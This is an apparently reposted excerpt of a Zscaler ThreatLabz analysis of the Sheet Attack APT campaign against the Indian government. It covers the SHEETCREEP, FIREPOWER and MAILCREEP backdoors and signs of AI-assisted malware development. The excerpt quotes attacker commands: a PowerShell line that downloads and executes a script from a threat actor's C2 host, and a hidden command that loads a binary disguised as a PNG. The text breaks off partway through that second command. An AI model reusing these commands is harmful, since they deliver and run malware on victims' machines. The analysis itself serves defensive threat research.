National Cyber Warfare Foundation (NCWF)

APT Attacks Target Indian Government Using SHEETCREEP, FIREPOWER, and MAILCREEP | Part 2
0 user ratings		2026-01-27 16:25:19
milo
Blue Team (CND)

This is Part 2 of our two-part technical analysis on the Gopher Strike and Sheet Attack campaigns. For details on the Gopher Strike campaign, go to Part 1.IntroductionIn September 2025, Zscaler ThreatLabz uncovered three additional backdoors, SHEETCREEP, FIREPOWER, and MAILCREEP, used to power the Sheet Attack campaign. In Part 2 of this series, ThreatLabz will delve into these backdoors and analyze how threat actors are leveraging generative AI in their malware development processes.The Sheet Attack campaign stands out for its use of Google Sheets as a command-and-control (C2) channel, an uncommon tactic in this region. Between November 2025 and January 2026, ThreatLabz observed the deployment of new tools, including SHEETCREEP and FIREPOWER, along with MAILCREEP, which is used to manipulate emails, and a PowerShell-based document stealer to exfiltrate files. Furthermore, the activity contained indicators suggesting that the threat actors have adopted AI as part of their malware development workflow, mirroring a global trend of AI adoption by malicious actors.Key TakeawaysThe Sheet Attack campaign leveraged PDFs to deploy lightweight backdoors that utilized multiple C2 channels that abused legitimate cloud services, such as Google and Microsoft, enabling the network traffic to blend in and evade security controls.ThreatLabz identified SHEETCREEP, FIREPOWER, and MAILCREEP as backdoors employed in the Sheet Attack campaign.SHEETCREEP is a lightweight backdoor written in C# that uses Google Sheets for C2 communication.FIREPOWER is a PowerShell-based backdoor that exploits Google’s Firebase Realtime Database for its C2 channel.MAILCREEP is a Golang-based backdoor leveraging the Microsoft Graph API for its C2 communications.ThreatLabz identified several high-confidence fingerprints within the malware of the Sheet Attack and Gopher Strike campaigns that strongly suggest the use of generative AI.ThreatLabz assesses with medium confidence that these campaigns likely originate from a new subgroup or a parallel Pakistan-linked group, despite sharing similarities with the APT36 threat group.Technical AnalysisIn the following sections, ThreatLabz provides a technical analysis of the Sheet Attack campaign, detailing the backdoors it leverages and examining the evidence that suggests AI was used to generate parts of the code.Initial infection vectorsSimilar to the Gopher Strike campaign, some of the initial Sheet Attack campaigns began with the delivery of a PDF file. The PDF displayed a redacted document that tricked the recipient into clicking a Download Document button to access the full content, as shown in the figure below. Figure 1: Example of a PDF file used in the Sheet Attack campaign.After clicking the button, the user was directed to a threat actor-controlled website that served a ZIP archive. Similar to the Gopher Strike campaign, the server employed geographic and User-Agent checks to ensure the ZIP archive was only delivered to Windows systems in India, returning a “403 Forbidden” error otherwise. These ZIP archives contained the SHEETCREEP backdoor. The figure below illustrates the attack flow of the PDF-based Sheet Attack campaign to distribute SHEETCREEP.Figure 2: The attack flow of the Sheet Attack campaign to distribute SHEETCREEP.More recent Sheet Attack campaigns have transitioned to using malicious LNK files to distribute another backdoor named FIREPOWER. These LNK files execute commands such as: --headless powershell -e [base64 powershell command] to execute a PowerShell script retrieved from a threat actor-controlled C2 server (e.g.,  irm https://hcidoc[.]in/[path] | iex).The figure below illustrates the attack flow of the Sheet Attack campaigns when malicious LNK files were used as the initial infection vector for FIREPOWER.Figure 3: The attack flow of the Sheet Attack campaigns when malicious LNK files were used as the initial infection vector for FIREPOWER.SHEETCREEP backdoorThe ZIP archive contains the following two components: a binary disguised with a PNG extension (details.png)a malicious LNK file containing the following command:powershell.exe -WindowStyle Hidden -Command "$b=[IO.File]::ReadAllBytes('details.png');([System.Reflection.Assembly]::Load([byte[

Yin Hong Chang (Zscaler)

Source: Security Boulevard
Source Link: https://securityboulevard.com/2026/01/apt-attacks-target-indian-government-using-sheetcreep-firepower-and-mailcreep-part-2/


Comments
new comment
Nobody has commented yet. Will you be the first?
  
Forum
Blue Team (CND)


Copyright 2012 through 2026 - National Cyber Warfare Foundation - All rights reserved worldwide.